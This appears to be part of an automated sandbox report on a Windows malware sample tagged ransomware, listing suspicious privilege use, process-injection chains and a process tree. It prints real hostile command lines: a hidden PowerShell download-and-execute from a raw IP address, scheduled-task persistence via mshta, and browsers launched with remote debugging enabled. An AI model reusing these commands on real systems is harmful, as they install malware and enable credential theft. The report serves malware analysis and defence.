N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 856 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
PID 3632 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
PID 4008 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3632 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
PID 2848 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
PID 2848 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe
PID 1404 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2848 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe
PID 448 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe C:\Windows\SysWOW64\cmd.exe
PID 448 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe C:\Windows\SysWOW64\mshta.exe
PID 1908 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3612 wrote to memory of 3096 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 624 wrote to memory of 4868 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe
PID 3096 wrote to memory of 4908 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE
PID 2848 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2208 wrote to memory of 3176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3176 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3176 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 4920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4184 wrote to memory of 3712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3176 wrote to memory of 4796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe

"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe

"C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 1DLw5mafSOb /tr "mshta C:\Users\Admin\AppData\Local\Temp\ezjRGBi5N.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\ezjRGBi5N.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 1DLw5mafSOb /tr "mshta C:\Users\Admin\AppData\Local\Temp\ezjRGBi5N.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe"

C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE

"C:\Users\Admin\AppData\Local\Temp0PZJULHHMQK22YB4KVAH3HBPL4NYETMR.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10038770121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10038770121\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\ProgramData\cxqswdu\bsnjgb.exe

C:\ProgramData\cxqswdu\bsnjgb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "vfYNomahyEJ" /tr "mshta \"C:\Temp\YiLDlq6mz.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\YiLDlq6mz.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe

C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe

"C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff97347cc40,0x7ff97347cc4c,0x7ff97347cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1792,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1788 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2408 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2620 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3376,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4628 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4808 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4480,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5040 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4900 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5148,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5036 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5056,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5180 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5184,i,3679127080721849601,10622344848848967234,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5332 /prefetch:2

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9734846f8,0x7ff973484708,0x7ff973484718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2544 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2704 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2588 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3328 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2120,12593301299467472263,3575818657680924911,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

